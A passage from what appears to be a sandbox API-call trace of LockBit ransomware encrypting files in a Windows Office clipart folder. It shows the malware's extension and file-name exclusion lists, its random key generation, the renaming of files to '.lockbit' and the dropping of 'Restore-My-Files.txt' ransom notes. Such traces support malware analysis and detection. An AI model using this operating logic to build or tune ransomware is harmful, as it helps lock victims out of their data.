hTemplateFile=0x0) returned 0x338 [0138.340] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.340] malloc (_Size=0x40068) returned 0x3e70008 [0138.340] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=17344) returned 1 [0138.340] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0138.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0138.341] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.346] malloc (_Size=0xa6) returned 0x77d7a8 [0138.346] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.347] free (_Block=0x77d7a8) [0138.347] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.347] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.347] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.348] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3264, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0103262.WMF", cAlternateFileName="")) returned 1 [0138.348] lstrcmpiW (lpString1=".", lpString2="J0103262.WMF") returned -1 [0138.348] lstrcmpiW (lpString1="..", lpString2="J0103262.WMF") returned -1 [0138.348] PathFindExtensionW (pszPath="J0103262.WMF") returned=".WMF" [0138.348] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.348] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.349] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.350] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.350] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0103262.WMF") returned 1 [0138.351] lstrcmpiW (lpString1="ntldr", lpString2="J0103262.WMF") returned 1 [0138.351] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0103262.WMF") returned 1 [0138.351] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0103262.WMF") returned -1 [0138.351] lstrcmpiW (lpString1="autorun.inf", lpString2="J0103262.WMF") returned -1 [0138.351] lstrcmpiW (lpString1="thumbs.db", lpString2="J0103262.WMF") returned 1 [0138.351] lstrcmpiW (lpString1="iconcache.db", lpString2="J0103262.WMF") returned -1 [0138.351] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.351] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned=".WMF" [0138.351] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.351] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.351] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.352] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.352] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF.lockbit") returned 72 [0138.352] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103262.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0138.353] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.353] malloc (_Size=0x40068) returned 0x3ef0008 [0138.353] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=12900) returned 1 [0138.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0138.354] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.354] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0138.354] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0138.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.360] malloc (_Size=0xa6) returned 0x77d7a8 [0138.360] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.361] free (_Block=0x77d7a8) [0138.361] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.361] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.361] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.361] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xaf94, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0103402.WMF", cAlternateFileName="")) returned 1 [0138.361] lstrcmpiW (lpString1=".", lpString2="J0103402.WMF") returned -1 [0138.361] lstrcmpiW (lpString1="..", lpString2="J0103402.WMF") returned -1 [0138.361] PathFindExtensionW (pszPath="J0103402.WMF") returned=".WMF" [0138.361] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.361] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.361] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.361] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.361] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.361] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.361] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.361] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.362] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.363] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.363] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0103402.WMF") returned 1 [0138.363] lstrcmpiW (lpString1="ntldr", lpString2="J0103402.WMF") returned 1 [0138.363] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0103402.WMF") returned 1 [0138.363] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0103402.WMF") returned -1 [0138.364] lstrcmpiW (lpString1="autorun.inf", lpString2="J0103402.WMF") returned -1 [0138.364] lstrcmpiW (lpString1="thumbs.db", lpString2="J0103402.WMF") returned 1 [0138.364] lstrcmpiW (lpString1="iconcache.db", lpString2="J0103402.WMF") returned -1 [0138.364] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.364] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned=".WMF" [0138.364] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.364] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.364] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.365] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.365] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.365] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.365] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.365] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.365] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.365] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.365] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF.lockbit") returned 72 [0138.365] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103402.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.370] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.370] malloc (_Size=0x40068) returned 0x3df0008 [0138.370] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=44948) returned 1 [0138.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.371] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.373] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.373] malloc (_Size=0xa6) returned 0x77d7a8 [0138.373] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.374] free (_Block=0x77d7a8) [0138.374] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.374] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.374] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1714, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0103812.WMF", cAlternateFileName="")) returned 1 [0138.374] lstrcmpiW (lpString1=".", lpString2="J0103812.WMF") returned -1 [0138.374] lstrcmpiW (lpString1="..", lpString2="J0103812.WMF") returned -1 [0138.374] PathFindExtensionW (pszPath="J0103812.WMF") returned=".WMF" [0138.374] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.374] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.374] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.374] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.375] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.376] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.376] 